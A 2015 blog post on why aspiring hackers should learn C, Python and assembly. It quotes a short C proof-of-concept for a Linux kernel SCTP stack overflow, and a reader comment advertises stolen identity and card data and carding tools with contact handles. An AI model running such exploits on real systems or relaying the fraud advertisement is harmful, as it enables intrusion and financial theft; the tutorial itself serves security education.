Monday 20 July 2015

Introduction to Programming - why hacker need to learn programming !

Hacker is a term for both those who write code and those who exploit it.So programmers are hackers, so to become an ethical hacker you must know about programming! Programming is essential part to become a hacker. Programming knowledge helps you to discover vulnerabilities, how software can be exploited etc.

Now question is what is programming ?  Programming is a set of instructions. You have to give set of instruction to your computer to perform a task.

                                                           
                                                                   
A computer is made of thousand programs like text editor, internet explorer , media player etc. Why we need to write programs while programs have already written ? Consider a case, when any of these program can not perform the task that you want to perform ! this is where we need to write our own programs that can perform the task that we want to do. Suppose our task is to hack the computer ;-) and There is no program for this task. So we will write our program.

To instruct a computer to do something, the instructions must be written in its language.A computer understand set of instructions written in machine language i.e binary language. Binary means that there is a code of either 0 or 1 also known as OFF or ON.The primary language of computers, binary is still used in today's machines because its simple and elegant design. Binary's 0 and 1 method is efficient at detecting an electrical signal's off or on state.Computer program translates between binary information and the information you actually work with on a computer, such as decimal numbers, text, photos, sound and video.

But for human to understand machine language is very difficult. However, there was a time when programs written in binary language or machine language. You will not figure out by just looking at binary programs.To overcome this limitation, a new language is developed i.e. assembly language. With the assembly level language, it is easier for a programmer to define commands.It is easier to understand and use as compared to machine language because assembly language use names for the instructions which is human readable. .Instead of representing the machine language as numbers, the instructions and registers are given names in assembly languages.

An assembly language program is translated to machine language by an assembler. An assembler is a translator that translates assembly language into machine-readable code.
But Assembly language also have some limitations.To write assembly language for any processor , you must know low-level details of the processor architecture you are writing. Assembly language is depend on machine architecture. But remember for hacker, assembly language is must. A hacker that hasn’t mastered Assembly language is not a hacker because nothing really moves without it.

To overcome the limitations of assembly, high level languages were introduced like C, C++, JAVA, Python. Program written in a high-level language can be translated into many machine language and therefore can run on any computer for which there exists an appropriate translator. A compiler converts a high-level language into machine language.A compiler is a special program that processes statements written in a particular programming language and turns them into machine language that a computer's processor uses.  High-level languages are much more intuitive than assembly language. A program written in a high-level language is much more readable.

The overall evolution of programming languages can be understand by this figure :
                   
                              
High-level Programming languages generally fall into one of two categories: Compiled or Interpreted.
In a compiled implementation, the original program is translated into native machine instructions, which are executed directly by the hardware like C/C++. An interpreted language is a programming language in which programs are 'indirectly' executed ("interpreted") by an interpreter program like python .If i say in simple words,  Interpreting code means taking a set of instructions and returning an answer whereas Compiling means converting a program in one language to another language.For example,in C the code we write that defines the commands we want to run is processed through a compiler and turned into machine code that is directly executable by the kernel/CPU.The resultant file is executable file(.exe) which is not human-readable .In interpreted languages, the code we create that contains our commands is read by an interpreter that does the conversion to machine code itself, as it’s running the script. The code here is still human-readable. Compiled programs generally run faster than interpreted ones because interpreted programs must be reduced to machine instructions at run time.

After discussing the history of computer programming, now we will discuss the real application of programming in wild hacker world. For computer hacker, you must have the knowledge of three languages : Python, C/C++(C recommended) and Assembly.For beginner, i would recommend you have to start with python. Because Python is very simple, flexible.

I will discuss about real implementation of these programming in details.

C/C++ : Most of Operating systems like Linux, Windows etc are written in C/C++. Around 90 % programs of computer systems are written in C language. To find a bug,security hole or break the code, First you have to know is how the code is written. If You would not know how to code is written,how do you break the code or hack the code ? So every hacker should be master in C and it is the must. If you are master in C, then you could easily exploit stack overflow,heap overflow, format string vulnerabilities if they are exists in any program.Another application of C programming in hacker world is in exploits writing. let's we take a code snippet of a Linux Kernel "  'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow " exploit from The Exploit Database :

#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define SCTP_GET_ASSOC_STATS 112
#define SOL_SCTP 132

int main(void)
{      char*buf="
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    socklen_t len = strlen(buf);
    int fd;

    fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
    getsockopt(fd, SOL_SCTP, SCTP_GET_ASSOC_STATS, buf, &len);
    return 0;
}

Do not panic from this code. On this blog Programming : An Ethical Hacker's way , I will help you to understand this code.Here on this blog, you'll find complete tutorials for learning C in hacker way.This is exploit of Stack-Based Buffer Overflow vulnerability.A buffer overflow occurs when a function copies data into a buffer without checking.  Here we fill buffer with A's and to buffer is overflowed, we attempting to store more data within the buffer than its fixed size allows. We will discuss about buffer flow in detail later.
Now question is for a hacker, What to learn in C programming ? For a intermediate level hacker, you must learn about what is data types, operators, Variables, functions,control flow(if-else),loops ,arrays, structure, pointer. The above exploit program is also consist of  data-types, function, pointer, variables and simple networking. If you want to become more advanced computer hacker, then you have to learn  algorithms and data structures.
Another application of C programming in hacker world is shell-coding. Shell code is a piece of machine-readable code that has just one mission: to open up a command interpreter (shell) on the target system so that an “attacker” can type in commands as a regular authorized user or system administrator of that system can do.shellcode do the real work once a program has been hacked.However Assembly is most widely used for writing shellcode.One thing that you should remember while writing shell code Don’t think like a programmer. We will discuss about shellcoding in detail later.


Python : Python is becoming the  natural leader in the hacking- programming language department.it is interpreted language or scripting language.There is another extremely popular open source interpreted programming language i.e. Perl which is also favorite of hackers.When python is compared to Perl, Python programs are definitely simpler, clearer, easier to write and hence more understandable and maintainable. That's why i would recommend you to learn python.
The application of python is it is most used language for exploit writing. Nowadays every exploit are written in python. Have a look at REMOTE EXPLOITS of The Exploit Database. Most of them are written in Python.Another application of python for hackers and security analysts is  for creating powerful and effective tools. Here on this blog Programming : An Ethical Hacker's way  , you'll find complete tutorials for learning python in hacker way.

Assembly Language : Assembly language is probably the most important things one needs to master if he/she desire to enter the world of hacking. It is a little difficult language as compared to C/C++ or python. Suppose you have want to find vulnerability in a software. As is obvious, You will not have the source code. this is where assembly comes in action. The  application of assembly language is in finding security holes or bug without the source code(Written in C/C++).  Assembly knowledge will help at almost every stage of exploitation. Assembly language programming is mandatory for developing your own exploits.The assembly language is also used for malware , rootkits, viruses writing, etc.Another application of assembly is in writing shellcoing. However,a decent understanding of x86 assembly, C, and knowledge of the Linux and Windows operating systems is required for writing shellcode.Here on this  blog Programming : An Ethical Hacker's way  , you'll find complete tutorials for learning assembly in hacker way.

In short , C helps to understand how programs are made, Assembly is helps in finding security holes or bugs and python is used to exploit these vulnerabilities.

I think now you've got the answer of "why hacker need to learn programming ?"
Answer : Hackers should study programming and learn as much about the subject as possible in order to find vulnerabilities in programs and get them fixed before unethical hackers take advantage of them.

The purpose of this blog is to give you the survival skills necessary to understand in upcoming post and find the holes in software before the unethical hackers do.
If you like this post or have any question, please feel free to comment ! 

4 comments:

  1. This comment has been removed by a blog administrator.

    ReplyDelete
  2. This comment has been removed by a blog administrator.

    ReplyDelete
  3. Fullz & Tools with Tutorials Available
    Genuine Stuff

    SSN DOB DL FULLZ
    CC with CVV FULLZ
    HIGH CREDIT FULLZ
    DUMPS TRACK 101 & 202
    I'm Available ON:
    752822040-->ICQ
    @killhacks-->Tele-gram

    All Tools With tutorials Guide
    Car-ding Spa-mming Hac-king Scr-ipting
    With ebooks & complete guides
    752822040-->ICQ
    @killhacks-->Tele-gram

    ReplyDelete

Blogger Widget